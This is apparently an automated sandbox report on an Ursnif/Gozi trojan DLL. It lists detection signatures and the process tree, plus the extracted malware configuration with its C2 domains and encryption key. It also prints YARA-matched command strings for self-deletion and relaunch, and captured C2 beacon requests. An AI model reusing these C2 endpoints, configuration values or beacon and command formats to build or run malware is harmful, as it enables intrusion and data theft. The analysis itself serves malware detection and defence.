Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ursnif_IAT_corrected.exe.dll

Overview

General Information

Sample Name:ursnif_IAT_corrected.exe.dll
Analysis ID:727158
MD5:8b52c277c63c5877c0e4ca32d1458957
SHA1:1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
SHA256:8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
Tags:dllursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4124 cmdline: loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5080 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5020 cmdline: rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5216 cmdline: regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 780 cmdline: rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
{"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
ursnif_IAT_corrected.exe.dllJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
      • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
      • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
      • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
      • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
      • 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
      00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
        • 0xff0:$a1: /C ping localhost -n %u && del "%s"
        • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
        • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
        • 0xca8:$a5: filename="%.4u.%lu"
        • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
        • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
        • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
        • 0xe72:$a9: &whoami=%s
        • 0xe5a:$a10: %u.%u_%u_%u_x%u
        • 0xc22:$a11: size=%u&hash=0x%08x
        • 0xc13:$a12: &uptime=%u
        • 0xda7:$a13: %systemroot%\system32\c_1252.nls
        • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
        Click to see the 119 entries
        SourceRuleDescriptionAuthorStrings
        0.2.loaddll32.exe.13794a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          4.2.rundll32.exe.10000000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            3.2.regsvr32.exe.10000000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.2.regsvr32.exe.4a494a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.2.rundll32.exe.49b94a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  Click to see the 7 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.413.107.42.1649715802033204 10/21/22-00:25:18.871319
                  SID:2033204
                  Source Port:49715
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649747802033204 10/21/22-00:27:40.718067
                  SID:2033204
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649718802033204 10/21/22-00:25:20.730105
                  SID:2033204
                  Source Port:49718
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649747802033203 10/21/22-00:27:40.718067
                  SID:2033203
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349742802033203 10/21/22-00:27:12.300672
                  SID:2033203
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349742802033204 10/21/22-00:27:12.300672
                  SID:2033204
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649711802033203 10/21/22-00:25:09.002887
                  SID:2033203
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.48.8.8.859444532023883 10/21/22-00:25:29.478642
                  SID:2023883
                  Source Port:59444
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.413.107.42.1649711802033204 10/21/22-00:25:09.002887
                  SID:2033204
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.48.8.8.858914532023883 10/21/22-00:27:11.884556
                  SID:2023883
                  Source Port:58914
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.413.107.42.1649719802033203 10/21/22-00:25:23.881073
                  SID:2033203
                  Source Port:49719
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349743802033203 10/21/22-00:27:20.607846
                  SID:2033203
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349743802033204 10/21/22-00:27:20.607846
                  SID:2033204
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349744802033204 10/21/22-00:27:22.814108
                  SID:2033204
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649748802033203 10/21/22-00:27:42.910400
                  SID:2033203
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649746802033204 10/21/22-00:27:32.445316
                  SID:2033204
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.413.107.42.1649748802033204 10/21/22-00:27:42.910400
                  SID:2033204
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349744802033203 10/21/22-00:27:22.814108
                  SID:2033203
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.462.173.145.18349745802033204 10/21/22-00:27:25.963477
                  SID:2033204
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: ursnif_IAT_corrected.exe.dllVirustotal: Detection: 55%Perma Link
                  Source: ursnif_IAT_corrected.exe.dllAvira: detected
                  Source: linetwork.topVirustotal: Detection: 12%Perma Link
                  Source: onlinetwork.topVirustotal: Detection: 12%Perma Link
                  Source: http://onlinetwork.top/Virustotal: Detection: 12%Perma Link
                  Source: ursnif_IAT_corrected.exe.dllJoe Sandbox ML: detected
                  Source: ursnif_IAT_corrected.exe.dllMalware Configuration Extractor: Ursnif {"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: ursnif_IAT_corrected.exe.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

                  Networking

                  barindex
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.145.183 80
                  Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: onlinetwork.top
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.194 80
                  Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: linetwork.top
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49711 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49711 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49715 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49718 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49719 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:59444 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:58914 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49742 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49742 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49743 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49743 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49744 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49744 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49745 -> 62.173.145.183:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49746 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49747 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49747 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49748 -> 13.107.42.16:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49748 -> 13.107.42.16:80
                  Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
                  Source: Joe Sandbox ViewASN Name: ASRELINKRU ASRELINKRU
                  Source: global trafficHTTP traffic detected: GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.ed4
                  Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype
                  Source: rundll32.exe, 00000004.00000002.817297362.0000000002EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/
                  Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/PS2yhImkf/WUfx3th5Boa7ltUMwMtx/yWw24ht9TmQzrZJd3f7/J6v0UwdZxUlWdBE
                  Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/m7TsF_2BzBjOID/ubqoU4I8FDNox2Pjk9c8A/V6pB6NWoxVj8rIbr/Z2mudDVWbTE4
                  Source: rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/uMeu18bcwP4rXMlifz6Q2/6Hy8MUrv67vFVnMI/nOHGGP0ADwhulYb/27ZJOLUh406
                  Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/xnjpjMCMe2_2BcaLBxlal/IEyR7r9yGjIMn5iD/iXB1XVZ1XOEDbhK/s9wDAd9rC3K
                  Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/p
                  Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/
                  Source: rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/7
                  Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo
                  Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/)
                  Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/M
                  Source: rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR
                  Source: rundll32.exe, 00000004.00000002.817078743.0000000002E65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5
                  Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.816986286.0000000002B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7
                  Source: rundll32.exe, 00000005.00000002.817185971.0000000002E0C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K
                  Source: unknownDNS traffic detected: queries for: onlinetwork.top
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                  Source: global trafficHTTP traffic detected: GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: linetwork.topConnection: Keep-AliveCache-Control: no-cache
